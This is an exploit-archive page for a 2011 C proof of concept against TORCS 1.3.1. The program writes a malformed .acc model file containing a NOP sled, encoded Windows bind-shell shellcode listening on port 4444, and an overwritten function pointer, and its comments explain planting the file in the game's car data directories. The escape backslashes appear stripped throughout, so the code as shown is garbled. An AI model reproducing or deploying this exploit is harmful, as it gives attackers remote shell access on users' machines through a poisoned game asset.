TORCS 1.3.1 acc Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TORCS 1.3.1 acc Buffer Overflow
# Published : 2011-12-20
# Author :
# Previous Title : VLC Media Player RealText Subtitle Overflow
# Next Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit MSF

/* Exploit Title: TORCS acc Buffer Overflow
# Date: 20/12/2011
# Author: Andres Gomez
# Software Link: http://torcs.sourceforge.net/
# Version: torcs 1.3.1
# Tested on: Windows
# CVE : */

/*
    This exploit generates a corrupted acc file 
    which has to be saved in the directories where
    TORCS loads its data, for example replace 
    cars/car4-trb1/car4-trb1.acc and put test.acc or create 
    a new car/track and select it in the TORCS menu
*/


#include <stdio.h>
#include <stdlib.h>

/*
   Shellcode: windows/shell_bind_tcp LPORT=4444 -b 'x00xffx0a'
   Encoder: x86/shikata_ga_nai
*/

unsigned char buf[] = 
"xbdx2exedxb6x2dxddxc2xd9x74x24xf4x5ex2bxc9xb1"
"x56x83xeexfcx31x6ex0fx03x6ex21x0fx43xd1xd5x46"
"xacx2ax25x39x24xcfx14x6bx52x9bx04xbbx10xc9xa4"
"x30x74xfax3fx34x51x0dx88xf3x87x20x09x32x08xee"
"xc9x54xf4xedx1dxb7xc5x3dx50xb6x02x23x9axeaxdb"
"x2fx08x1bx6fx6dx90x1axbfxf9xa8x64xbax3ex5cxdf"
"xc5x6exccx54x8dx96x67x32x2exa6xa4x20x12xe1xc1"
"x93xe0xf0x03xeax09xc3x6bxa1x37xebx66xbbx70xcc"
"x98xcex8ax2ex25xc9x48x4cxf1x5cx4dxf6x72xc6xb5"
"x06x57x91x3ex04x1cxd5x19x09xa3x3ax12x35x28xbd"
"xf5xbfx6ax9axd1xe4x29x83x40x41x9cxbcx93x2dx41"
"x19xdfxdcx96x1bx82x88x5bx16x3dx49xf3x21x4ex7b"
"x5cx9axd8x37x15x04x1ex37x0cxf0xb0xc6xaex01x98"
"x0cxfax51xb2xa5x82x39x42x49x57xedx12xe5x07x4e"
"xc3x45xf7x26x09x4ax28x56x32x80x5fx50xfcxf0x0c"
"x37xfdx06xa3x9bx88xe1xa9x33xddxbax45xf6x3ax73"
"xf2x09x69x2fxabx9dx25x39x6bxa1xb5x6fxd8x0ex1d"
"xf8xaax5cx9ax19xadx48x8ax50x96x1bx40x0dx55xbd"
"x55x04x0dx5exc7xc3xcdx29xf4x5bx9ax7excax95x4e"
"x93x75x0cx6cx6exe3x77x34xb5xd0x76xb5x38x6cx5d"
"xa5x84x6dxd9x91x58x38xb7x4fx1fx92x79x39xc9x49"
"xd0xadx8cxa1xe3xabx90xefx95x53x20x46xe0x6cx8d"
"x0exe4x15xf3xaex0bxccxb7xdfx41x4cx91x77x0cx05"
"xa3x15xafxf0xe0x23x2cxf0x98xd7x2cx71x9cx9cxea"
"x6axecx8dx9ex8cx43xadx8a";

// this points to your shellcode
unsigned char function_pointer [] = "xA8xCAx0Ex10";

int main(int argc, char **argv) {

    FILE *save_fd;
    int i=0;

    save_fd = fopen("test.acc", "w");

    if (save_fd == NULL) {
	    printf("Failed to open '%s' for writing", "test.acc");
	    return -1;
    }

    fprintf(save_fd, "AC3Dbn");
    fprintf(save_fd, "MATERIAL "");
    for(i=0; i < 607; i++) {
    	putc('x90', save_fd);
    }
    fprintf(save_fd, "%s%s" rgb 0.4 0.4 0.4  amb 0.8 0.8 0.8  emis 0.4 0.4 0.4  spec 0.5 0.5 0.5  shi 50  trans 0n", buf, function_pointer);
    fprintf(save_fd, "OBJECT worldn");
    fprintf(save_fd, "kids %dn", 5);

    close(save_fd);

    return 0;
}